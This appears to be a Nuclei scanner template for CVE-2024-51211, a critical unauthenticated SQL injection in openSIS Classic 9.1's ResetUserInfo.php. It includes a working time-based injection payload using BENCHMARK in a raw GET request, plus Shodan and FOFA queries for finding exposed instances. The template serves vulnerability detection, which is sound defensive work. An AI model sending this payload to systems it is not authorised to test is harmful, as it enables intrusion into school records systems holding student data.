id: CVE-2024-51211

info:
  name: openSIS Classic v9.1 - SQL Injection
  author: Haliteroglu
  severity: critical
  description: |
    SQL injection vulnerability exists in OS4ED openSIS-Classic Version 9.1, specifically in the resetuserinfo.php file. The vulnerability is due to improper input validation of the $username_stn_id parameter, which can be manipulated by an attacker to inject arbitrary SQL commands.
  impact: |
    Attackers can exploit this vulnerability to compromise system security and integrity.
  remediation: |
    Apply the latest security patches and updates to address this vulnerability.
  reference:
    - https://github.com/kutsa1/My-CVE/tree/main/CVE-2024-51211
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51211
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-51211
    cwe-id: CWE-89
    epss-score: 0.0406
    epss-percentile: 0.8873
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="openSIS"
    shodan-query: title:"openSIS"
  tags: cve,cve2024,sqli,opensis,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=21+OR+3720%3dBENCHMARK(7000000,MD5(0x6e48446e))&pass=1&month_username_dob=x&day_username_dob=x&year_username_dob=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "contains_all(tolower(body), 'forgotpass.php', 'opensis')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100e9f4e7ddbaeccdbdbea28da630ff6975656f6bb118ee6b48f0a0da62c1db65a7022100814509c8b443ac5772a9258fbf09aa155f8d9b39f268880735ecd79bf97a8604:922c64590222798bb761d5b6d8e72950